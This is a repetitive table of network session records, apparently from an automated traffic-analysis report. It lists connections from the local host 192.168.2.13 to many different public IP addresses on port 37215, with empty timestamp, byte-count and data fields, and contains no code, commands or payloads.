                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12919192.168.2.135858241.224.81.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12920192.168.2.134836441.101.225.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12921192.168.2.1342918178.28.172.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12922192.168.2.1344244157.35.110.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12923192.168.2.1347884157.57.69.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12924192.168.2.1335268157.89.144.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12925192.168.2.1354066197.219.122.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12926192.168.2.1355530157.175.46.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12927192.168.2.1344034168.249.130.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12928192.168.2.133677441.87.183.23537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12929192.168.2.1336670113.155.133.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12930192.168.2.133291018.242.221.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12931192.168.2.1340586197.153.169.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12932192.168.2.134600657.243.226.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12933192.168.2.1338248157.250.206.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12934192.168.2.1344442197.217.188.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12935192.168.2.1335252157.89.186.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12936192.168.2.1351576120.101.147.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12937192.168.2.1358320157.61.26.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12938192.168.2.1357404157.108.189.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12939192.168.2.135184224.10.102.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12940192.168.2.133641641.136.99.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12941192.168.2.1341722197.3.160.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12942192.168.2.135308212.221.1.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12943192.168.2.1356706157.60.51.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12944192.168.2.1352684197.118.156.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12945192.168.2.134726241.165.70.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12946192.168.2.136069048.216.151.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12947192.168.2.133800241.125.50.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12948192.168.2.1337816119.4.18.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12949192.168.2.13542308.167.210.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12950192.168.2.1341500157.208.75.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12951192.168.2.13446625.241.109.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12952192.168.2.135329041.53.252.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12953192.168.2.135462841.164.56.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12954192.168.2.135657074.255.105.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12955192.168.2.1354656197.87.239.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12956192.168.2.1338708197.91.117.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12957192.168.2.1344628157.242.135.25137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12958192.168.2.1335958157.8.196.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12959192.168.2.1348230197.83.218.23337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12960192.168.2.134105241.130.32.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12961192.168.2.1339676197.144.207.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12962192.168.2.135802245.109.61.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12963192.168.2.1360622157.67.137.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12964192.168.2.1341962157.37.96.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12965192.168.2.1349796197.33.25.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12966192.168.2.1336102157.119.255.17837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12967192.168.2.1351442157.92.12.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12968192.168.2.135029480.191.123.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12969192.168.2.1349664138.71.85.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12970192.168.2.134866841.6.50.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12971192.168.2.135074241.117.197.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12972192.168.2.1360604197.91.36.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12973192.168.2.1356762195.104.2.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12974192.168.2.1359088157.163.199.1937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12975192.168.2.135462841.56.133.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12976192.168.2.1337544197.170.116.2737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12977192.168.2.134347018.203.189.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12978192.168.2.1335060170.236.35.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12979192.168.2.133816241.110.126.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12980192.168.2.1337622156.141.157.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12981192.168.2.1335610197.176.122.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12982192.168.2.135781441.109.52.18137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12983192.168.2.1359832157.242.38.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12984192.168.2.1345722157.100.108.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12985192.168.2.1355874197.86.152.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12986192.168.2.1360760125.69.57.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12987192.168.2.1359944157.77.67.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12988192.168.2.1343004122.109.224.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12989192.168.2.1357484202.5.117.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12990192.168.2.1345440197.23.227.6637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12991192.168.2.135020641.233.169.7937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12992192.168.2.133339441.97.16.12537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12993192.168.2.134813051.161.100.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12994192.168.2.1351040157.21.42.3737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12995192.168.2.133497841.83.25.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12996192.168.2.1345494161.99.77.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12997192.168.2.135360294.101.138.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12998192.168.2.1348610159.143.178.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  12999192.168.2.134029680.17.126.10837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13000192.168.2.135247041.158.159.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13001192.168.2.1347072197.112.226.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13002192.168.2.135606641.8.67.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13003192.168.2.1335096157.135.64.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13004192.168.2.135206441.94.159.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13005192.168.2.1338448157.99.240.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13006192.168.2.1337412157.157.66.9937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13007192.168.2.134465476.196.222.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13008192.168.2.1341210157.186.133.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13009192.168.2.135431041.73.164.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13010192.168.2.1349648157.255.187.11637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13011192.168.2.134245641.159.122.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13012192.168.2.1360932197.91.67.22237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13013192.168.2.1339126124.221.90.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13014192.168.2.135646488.164.129.5637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13015192.168.2.134114670.35.186.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13016192.168.2.1332842157.188.79.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13017192.168.2.1342082157.54.213.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13018192.168.2.1360360185.77.184.12737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13019192.168.2.1333610157.239.231.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13020192.168.2.134273441.158.80.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13021192.168.2.134867041.165.65.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13022192.168.2.1340472219.54.190.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13023192.168.2.136075665.228.222.21737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13024192.168.2.133722819.198.46.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13025192.168.2.133919841.23.99.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13026192.168.2.134069841.119.81.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13027192.168.2.1341156157.165.253.24337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13028192.168.2.134856441.196.126.14137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13029192.168.2.1356248199.130.158.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13030192.168.2.134412441.90.49.13937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13031192.168.2.1360504197.43.212.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13032192.168.2.1334472157.198.116.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13033192.168.2.1346138157.91.156.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13034192.168.2.1346952171.82.1.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13035192.168.2.1350496157.66.135.18037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13036192.168.2.1354120157.125.252.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13037192.168.2.1347960149.244.137.10137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13038192.168.2.1359062216.220.47.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13039192.168.2.134060241.36.228.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13040192.168.2.1348420157.139.116.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13041192.168.2.1338522178.51.118.6037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13042192.168.2.134021841.188.176.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13043192.168.2.1335942197.185.119.2637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13044192.168.2.1345212157.136.29.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13045192.168.2.135413441.59.133.7737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13046192.168.2.1348418197.229.247.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13047192.168.2.1340208157.151.251.23137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13048192.168.2.1350028157.221.202.9237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13049192.168.2.135210685.131.76.24237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13050192.168.2.1341948203.46.4.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13051192.168.2.1354304157.123.150.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13052192.168.2.1355596157.229.152.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13053192.168.2.1336110197.13.250.19537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13054192.168.2.1345602157.48.203.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13055192.168.2.1346760220.35.49.5337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13056192.168.2.1339008157.93.255.1537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13057192.168.2.135901057.126.47.7037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13058192.168.2.1337258157.21.55.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13059192.168.2.1344246157.185.61.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13060192.168.2.1334060157.142.201.5137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13061192.168.2.1339946111.128.10.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13062192.168.2.1352874197.43.245.5037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13063192.168.2.1341660197.54.251.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13064192.168.2.134273641.121.110.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13065192.168.2.133800859.30.124.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13066192.168.2.1357994197.231.225.637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13067192.168.2.1334408157.125.82.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13068192.168.2.1337576197.144.41.11137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13069192.168.2.1350798197.185.246.10737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13070192.168.2.134286041.148.101.737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13071192.168.2.134102254.48.8.24037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13072192.168.2.133616241.200.221.13637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13073192.168.2.134340241.238.174.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13074192.168.2.133952441.37.117.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13075192.168.2.1358904109.165.211.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13076192.168.2.1360010157.66.248.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13077192.168.2.1343722157.151.43.17137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13078192.168.2.1344326157.177.30.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13079192.168.2.134254841.120.26.12437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13080192.168.2.135070857.31.90.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13081192.168.2.134495641.4.193.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13082192.168.2.136054441.82.127.7337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13083192.168.2.135890641.187.234.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13084192.168.2.1342258197.12.147.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13085192.168.2.133948041.200.60.21137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13086192.168.2.135594841.222.23.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13087192.168.2.1348288218.47.114.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13088192.168.2.1360844197.9.128.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13089192.168.2.1355682197.236.31.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13090192.168.2.1340856157.159.93.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13091192.168.2.1344890157.76.240.22737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13092192.168.2.134824641.246.57.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13093192.168.2.1335454157.162.195.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13094192.168.2.134632241.6.156.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13095192.168.2.1354132149.199.134.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13096192.168.2.1333758217.210.64.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13097192.168.2.1335846197.135.239.9137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13098192.168.2.1333618197.86.246.8037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13099192.168.2.135031441.122.234.11237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13100192.168.2.1339018116.172.210.12337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13101192.168.2.1338976189.141.82.1837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13102192.168.2.1352504157.25.62.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13103192.168.2.136069641.140.53.14637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13104192.168.2.1350188197.93.234.6237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13105192.168.2.135652041.107.102.3137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13106192.168.2.1345538197.95.223.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13107192.168.2.135986441.191.199.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13108192.168.2.1337284119.248.164.8437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13109192.168.2.1347918197.123.179.10437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13110192.168.2.134437463.53.223.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13111192.168.2.1341560197.119.128.19437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13112192.168.2.1355078197.211.1.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13113192.168.2.133748843.76.62.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13114192.168.2.1334144197.240.68.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13115192.168.2.1360582157.5.223.4137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13116192.168.2.1334084157.64.5.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13117192.168.2.1332992197.184.221.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13118192.168.2.1340896157.232.193.24637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13119192.168.2.1336874131.10.71.9437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13120192.168.2.1344480197.143.56.24537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13121192.168.2.134294841.44.254.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13122192.168.2.1335986157.86.193.4037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13123192.168.2.135333654.20.213.15737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13124192.168.2.1352452197.90.3.16537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13125192.168.2.1352954157.116.93.14837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13126192.168.2.1340142157.169.70.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  13127192.168.2.1358512157.238.202.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
